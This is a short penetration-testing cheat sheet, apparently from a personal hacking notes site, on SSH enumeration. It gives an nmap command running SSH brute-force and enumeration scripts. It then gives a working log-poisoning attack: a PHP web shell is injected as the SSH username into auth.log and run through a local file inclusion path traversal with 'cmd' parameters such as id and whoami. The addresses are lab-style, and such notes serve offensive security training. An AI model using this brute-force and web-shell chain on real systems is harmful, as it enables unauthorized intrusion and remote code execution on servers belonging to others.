Hack$Notes
Search…
⌃K

SSH Enum

SSH Enumeration

CheckList

Probably not useful unless you uploaded key anywhere or found a private key file. Sometimes useful for log file poisoning with LFI.

Login and test SSH connectivity

SSH NMAP Scripts

nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1 10.10.10.20
Code Execution through SSH/LFI
ssh '<?php system($_GET['cmd']); ?>'@10.10.10.10
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=whoami
Last modified 1yr ago